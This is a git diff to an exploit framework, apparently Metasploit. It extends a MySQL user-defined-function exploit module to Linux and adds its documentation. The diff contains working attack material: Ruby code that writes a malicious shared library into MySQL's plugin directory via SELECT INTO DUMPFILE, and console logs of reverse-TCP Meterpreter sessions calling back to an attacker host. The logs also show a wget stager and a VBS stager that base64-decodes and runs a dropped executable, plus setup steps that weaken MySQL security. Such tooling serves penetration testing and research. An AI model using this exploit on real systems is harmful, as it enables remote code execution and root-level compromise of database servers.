diff --git a/data/exploits/mysql/lib_mysqludf_sys_32.so b/data/exploits/mysql/lib_mysqludf_sys_32.so new file mode 100644 index 0000000000..9eb5e82bad Binary files /dev/null and b/data/exploits/mysql/lib_mysqludf_sys_32.so differ diff --git a/data/exploits/mysql/lib_mysqludf_sys_64.so b/data/exploits/mysql/lib_mysqludf_sys_64.so new file mode 100644 index 0000000000..9c6999ecd1 Binary files /dev/null and b/data/exploits/mysql/lib_mysqludf_sys_64.so differ diff --git a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md new file mode 100644 index 0000000000..6c2bbd2321 --- /dev/null +++ b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md @@ -0,0 +1,175 @@ +## Vulnerable Application + +This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder. +The file is then loaded by mysql, and arbitrary commands can be run. There are several caveats for this to +function however, including: +1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing +to mysql's plugins folder +2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled. Equivalents on other linux systems most likely need the same +3. the mysql folder must be writable + +### Linux (Ubuntu 16.04 x64) Configuration + +In this configuration, we'll run mysql as root so we have a priv escalate. + + 1. Edit `/lib/systemd/system/mysql.service` and set `User=root` + 2. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`. After the `[mysqld]` section, change `user=mysql` to `user=root` + 3. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`. After the `[mysqld]` section, add `secure_file_priv=""` + 4. Disable app-armor for mysql: `sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld` + 5. Restart mysql service: `sudo systemctl restart mysql.service` + +If you need to make the root user accessible remotely +``` +GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password'; +FLUSH PRIVILEGES; +``` +or +``` +update user set host='%' where host='127.0.0.1'; +``` + +### Windows (Server 2012 x64) Configuration + +One good reference for these instructions is [PR #5334](https://github.com/rapid7/metasploit-framework/pull/5334) + + 1. Download and install mysql installer + 2. Install dependencies including, at the time of writing, Visual C++ 2013 Redistributable Package. + 3. Edit `C:\ProgramData\MySQL\MySQL Server\MySQL Server *\my.ini` and change the value of `secure-file-priv=` to `""` + 4. Make the `C:\Program Files\MySQL\MySQL Server *\lib\plugin` folder permissions writable by the MySQL (service) user. + +If you need to make the root user accessible remotely +``` +GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password'; +FLUSH PRIVILEGES; +``` +or +``` +update user set host='%' where host='127.0.0.1'; +``` + +## Verification Steps + + 1. Install MySQL and make it vulnerable as described above + 2. Start msfconsole + 3. Do: ```use exploit/multi/mysql/mysql_udf_payload``` + 4. Do: ```set rhost [ip]``` + 5. Do: ```set srvhost [ip]``` + 6. Make sure target and payload are correct + 7. Set mysql login information + 8. Do: ```exploit``` + 9. You should get a shell. + +## Options + + **FORCE_UDF_UPLOAD** + + This option will force the uploading of a UDF dll/so file even if one exists which has a system call already + +## Scenarios + +### Ubuntu 16.04 with MySQL 5.7.20 + +In this case, the service has been configured as noted in the first section of this document, a remotely accessible MySQL running as root. + +``` +[*] Processing udf.rc for ERB directives. +resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload +resource (udf.rc)> set payload linux/x86/meterpreter/reverse_tcp +payload => linux/x86/meterpreter/reverse_tcp +resource (udf.rc)> set lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (udf.rc)> set rhost 2.2.2.2 +rhost => 2.2.2.2 +resource (udf.rc)> set srvhost 1.1.1.1 +srvhost => 1.1.1.1 +resource (udf.rc)> set srvport 64423 +srvport => 64423 +resource (udf.rc)> set password wordpress +password => wordpress +resource (udf.rc)> set target 1 +target => 1 +resource (udf.rc)> set verbose true +verbose => true +msf exploit(mysql_udf_payload) > exploit + +[*] Started reverse TCP handler on 1.1.1.1:4444 +[*] 2.2.2.2:3306 - Checking target architecture... +[*] 2.2.2.2:3306 - Checking for sys_exec()... +[*] 2.2.2.2:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD). +[*] 2.2.2.2:3306 - Using URL: http://1.1.1.1:64423/YMDYyVp1fG +[*] 2.2.2.2:3306 - Client 2.2.2.2 (Wget/1.17.1 (linux-gnu)) requested /YMDYyVp1fG +[*] 2.2.2.2:3306 - Sending payload to 2.2.2.2 (Wget/1.17.1 (linux-gnu)) +[*] Transmitting intermediate stager...(106 bytes) +[*] Sending stage (826872 bytes) to 2.2.2.2 +[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46330) at 2017-10-30 23:22:08 -0400 +[-] 2.2.2.2:3306 - Exploit failed: Rex::StreamClosedError Stream # is closed. +[*] 2.2.2.2:3306 - Server stopped. +[*] Exploit completed, but no session was created. +msf exploit(mysql_udf_payload) > sessions -i 4 +[*] Starting interaction with 4... + +meterpreter > sysinfo +Computer : 2.2.2.2 +OS : (Linux 4.4.0-98-generic) +Architecture : x64 +Meterpreter : x86/linux +meterpreter > getuid +Server username: uid=0, gid=0, euid=0, egid=0 +``` + +### Windows Server 2012 with MySQL 5.7.20 + +``` +[*] Processing udf.rc for ERB directives. +resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload +resource (udf.rc)> set lhost 1.1.1.1 +lhost => 1.1.1.1 +resource (udf.rc)> set srvhost 1.1.1.1 +srvhost => 1.1.1.1 +resource (udf.rc)> set srvport 64423 +srvport => 64423 +resource (udf.rc)> set verbose true +verbose => true +msf exploit(mysql_udf_payload) > set target 0 +target => 0 +msf exploit(mysql_udf_payload) > set payload windows/meterpreter/reverse_tcp +payload => windows/meterpreter/reverse_tcp +msf exploit(mysql_udf_payload) > set rhost 3.3.3.3 +rhost => 3.3.3.3 +msf exploit(mysql_udf_payload) > set password mysql +password => mysql +msf exploit(mysql_udf_payload) > exploit + +[*] Started reverse TCP handler on 1.1.1.1:4444 +[*] 3.3.3.3:3306 - Checking target architecture... +[*] 3.3.3.3:3306 - Checking for sys_exec()... +[*] 3.3.3.3:3306 - Checking target architecture... +[*] 3.3.3.3:3306 - Checking for MySQL plugin directory... +[*] 3.3.3.3:3306 - Target arch (win64) and target path both okay. +[*] 3.3.3.3:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/jfAzUfJP.dll... +[*] 3.3.3.3:3306 - Checking for sys_exec()... +[*] 3.3.3.3:3306 - Executing: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAyzSjSgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAB2HwAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64 +[*] 3.3.3.3:3306 - Command Stager progress - 1.47% done (1499/102246 bytes) +``` +...snip... +``` +[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64 +[*] 3.3.3.3:3306 - Command Stager progress - 96.76% done (98934/102246 bytes) +[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\EkEiJ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\GTKoi.vbs & echo Set file = fs.GetFile("%TEMP%\EkEiJ.b64") >>%TEMP%\GTKoi.vbs & echo If file.Size Then >>%TEMP%\GTKoi.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\EkEiJ.b64", 1) >>%TEMP%\GTKoi.vbs & echo data = fd.ReadAll >>%TEMP%\GTKoi.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\GTKoi.vbs & echo data = base64_decode(data) >>%TEMP%\GTKoi.vbs & echo fd.Close >>%TEMP%\GTKoi.vbs +[*] 3.3.3.3:3306 - Command Stager progress - 98.19% done (100400/102246 bytes) +[*] 3.3.3.3:3306 - Executing: echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\CVVsw.exe", 2, True) >>%TEMP%\GTKoi.vbs & echo ofs.Write data >>%TEMP%\GTKoi.vbs & echo ofs.close >>%TEMP%\GTKoi.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\GTKoi.vbs & echo shell.run "%TEMP%\CVVsw.exe", 0, false >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\GTKoi.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\GTKoi.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\GTKoi.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\GTKoi.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\GTKoi.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\GTKoi.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\GTKoi.vbs & echo If Not w2 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w3 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w4 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\GTKoi.vbs & echo Next >>%TEMP%\GTKoi.vbs & echo base64_decode = strOut >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\GTKoi.vbs +[*] 3.3.3.3:3306 - Command Stager progress - 99.59% done (101827/102246 bytes) +[*] 3.3.3.3:3306 - Executing: echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\GTKoi.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\GTKoi.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & cscript //nologo %TEMP%\GTKoi.vbs +[*] 3.3.3.3:3306 - Command Stager progress - 100.00% done (102246/102246 bytes) +[*] Sending stage (179267 bytes) to 3.3.3.3 +[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 3.3.3.3:49165) at 2017-11-02 23:12:07 -0400 + +meterpreter > sysinfo +Computer : WIN-OBKF2JFCDKL +OS : Windows 2012 (Build 9200). +Architecture : x64 +System Language : en_US +Domain : WORKGROUP +Logged On Users : 1 +Meterpreter : x86/windows +``` diff --git a/lib/msf/core/exploit/mysql.rb b/lib/msf/core/exploit/mysql.rb index c41d7edd7d..7de60a8a2a 100644 --- a/lib/msf/core/exploit/mysql.rb +++ b/lib/msf/core/exploit/mysql.rb @@ -144,21 +144,32 @@ module Exploit::Remote::MYSQL binname = Rex::Text.rand_text_alpha(8) binpath = tmpdir << binname print_status "Uploading binary as #{binpath}..." + print_status "SELECT #{blob} into DUMPFILE '#{binpath}'" res = mysql_query("SELECT #{blob} into DUMPFILE '#{binpath}'") return res end def mysql_upload_sys_udf(arch=:win32,target_path=nil) - fname = (arch == :win32 ? "lib_mysqludf_sys_32.dll" : "lib_mysqludf_sys_64.dll") + case arch + when :win32 + fname = 'lib_mysqludf_sys_32.dll' + when :win64 + fname = 'lib_mysqludf_sys_64.dll' + when :linux32 + fname = 'lib_mysqludf_sys_32.so' + when :linux64 + fname = 'lib_mysqludf_sys_64.so' + end sys_dll = File.join( Msf::Config.data_directory, "exploits", "mysql", fname ) data = File.open(sys_dll, "rb") {|f| f.read f.stat.size} blob = "0x" blob << data.unpack("C*").map {|x| "%02x" % [x]}.join dll_name = Rex::Text.rand_text_alpha(8) - target_dll = target_path << dll_name << ".dll" + [:win32, :win64].include?(arch) ? extension = '.dll' : extension = '.so' + target_dll = target_path << dll_name << extension print_status "Uploading #{fname} library to #{target_dll}..." mysql_query("SELECT #{blob} into DUMPFILE '#{target_dll}'") - return dll_name << ".dll" + return dll_name << extension end def mysql_drop_and_create_sys_exec(soname) @@ -181,6 +192,15 @@ module Exploit::Remote::MYSQL :win64 when /Win32/i :win32 + when /Linux/i + # we need a second query to determine bits + res = mysql_get_variable("@@version_compile_machine") + return :unknown unless res + if res =~ /x86_64/i + :linux64 + else + :linux32 + end else res end @@ -189,7 +209,7 @@ module Exploit::Remote::MYSQL def mysql_add_sys_exec arch = mysql_get_arch case arch - when :win64,:win32 + when :win64,:win32,:linux64,:linux32 target_path = mysql_get_plugin_dir if target_path print_status "Target arch (#{arch}) and target path both okay." diff --git a/modules/exploits/windows/mysql/mysql_payload.rb b/modules/exploits/multi/mysql/mysql_udf_payload.rb similarity index 86% rename from modules/exploits/windows/mysql/mysql_payload.rb rename to modules/exploits/multi/mysql/mysql_udf_payload.rb index 987afbcd03..e9f9636d2e 100644 --- a/modules/exploits/windows/mysql/mysql_payload.rb +++ b/modules/exploits/multi/mysql/mysql_udf_payload.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info( info, - 'Name' => 'Oracle MySQL for Microsoft Windows Payload Execution', + 'Name' => 'Oracle MySQL UDF Payload Execution', 'Description' => %q{ This module creates and enables a custom UDF (user defined function) on the target host via the SELECT ... into DUMPFILE method of binary injection. On @@ -27,7 +27,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'Bernardo Damele A. G. ', # the lib_mysqludf_sys.dll binaries - 'todb' # this Metasploit module + 'todb', # this Metasploit module + 'h00die' # linux addition ], 'License' => MSF_LICENSE, 'References' => @@ -35,12 +36,12 @@ class MetasploitModule < Msf::Exploit::Remote # Bernardo's work with cmd exec via udf [ 'URL', 'http://bernardodamele.blogspot.com/2009/01/command-execution-with-mysql-udf.html' ] ], - 'Platform' => 'win', + 'Platform' => ['win', 'linux'], 'Targets' => [ - [ 'Automatic', { } ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit) + [ 'Windows', {'CmdStagerFlavor' => 'vbs'} ], # Confirmed on MySQL 4.1.22, 5.5.9, and 5.1.56 (64bit) + [ 'Linux', {'CmdStagerFlavor' => 'wget' } ] ], - 'CmdStagerFlavor' => 'vbs', 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 16 2009' # Date of Bernardo's blog post. )) @@ -83,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Remote if not m return - elsif not [:win32,:win64].include?(@mysql_arch) + elsif not [:win32,:win64,:linux64,:linux32].include?(@mysql_arch) print_status("Incompatible MySQL target architecture: '#{@mysql_arch}'") return else